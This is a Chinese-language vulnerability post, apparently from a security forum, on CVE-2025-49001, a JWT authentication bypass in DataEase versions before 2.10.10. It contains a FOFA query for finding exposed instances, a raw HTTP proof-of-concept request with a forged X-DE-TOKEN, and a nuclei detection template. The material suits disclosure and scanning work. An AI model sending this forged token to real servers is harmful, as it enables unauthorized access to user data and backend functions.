免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞描述:
DataEase是一款开源的商业智能和数据可视化工具。CVE-2025-49001 中,由于JWT算法实现存在缺陷,导致攻击者可以使用任何secret来伪造JWT令牌,从而绕过权限校验调用后台相关功能接口,甚至造成代码执行。
影响版本:
version < 2.10.10
FOFA:
body="/js/index-0.0.0-dataease.js" || body="/assets/css/style-0.0.0-dataease.css"POC:
GET /de2api/user/info HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Connection: close
Host: xx.x.xx.xx
out_auth_platform: default
X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8通过调用/de2api/user/info接口获取用户信息
nuclei 模板:
id: cve-2025-49001
info:
name: Dataease JWT Authentication Bypass
author: ProjectDiscoveryAI
severity: medium
description: |
This template checks for the Dataease JWT Authentication Bypass vulnerability (CVE-2025-49001).
Exploitation involves sending a crafted JWT token to bypass authentication.
tags: jwt,auth-bypass,cve
http:
- raw:
- |
GET /de2api/user/info HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: application/json, text/plain, */*
Connection: close
out_auth_platform: default
X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "\"uid\":1"
- "\"oid\":1"
part: body
没有回复内容